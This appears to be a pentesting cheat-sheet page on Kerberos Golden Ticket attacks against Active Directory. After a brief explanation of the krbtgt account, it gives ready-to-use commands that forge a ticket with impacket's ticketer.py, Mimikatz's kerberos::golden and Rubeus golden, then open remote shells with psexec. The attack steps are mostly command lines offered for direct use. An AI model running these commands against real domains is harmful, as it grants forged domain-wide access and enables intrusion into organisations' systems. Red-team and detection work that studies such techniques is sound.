Golden Tickets
A Golden Ticket is a Ticket Granting Ticket (TGT) for the krbtgt domain account, the service account for the Key Distribution Center. This special TGT can be used to obtain a Service Ticket for any service on the network.
The password (more commonly NTLM hash) for the krbtgt account is required to obtain the TGT/Golden Ticket. This is often obtained through a DCSync attack once you get domain administrator privileges or similar.
Exploit
## Create a Golden Ticket Using the NT Hash of the krbtgt Account
ticketer.py -nthash [krbtgt nt hash] -domain-sid [domain sid] -domain [domain] krbtgt
## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]
## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/krbtgt@[computer] -k -no-pass## Run Mimikatz.exe
Mimikatz.exe
## Create Golden Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[krbtgt nt hash] /user:weelee /ptt
## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd## Create A Golden Ticket And Inject It Into The Current Process
Rubeus.exe golden /rc4:[nt hash] /user:weelee /ldap /ptt
## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmdLast updated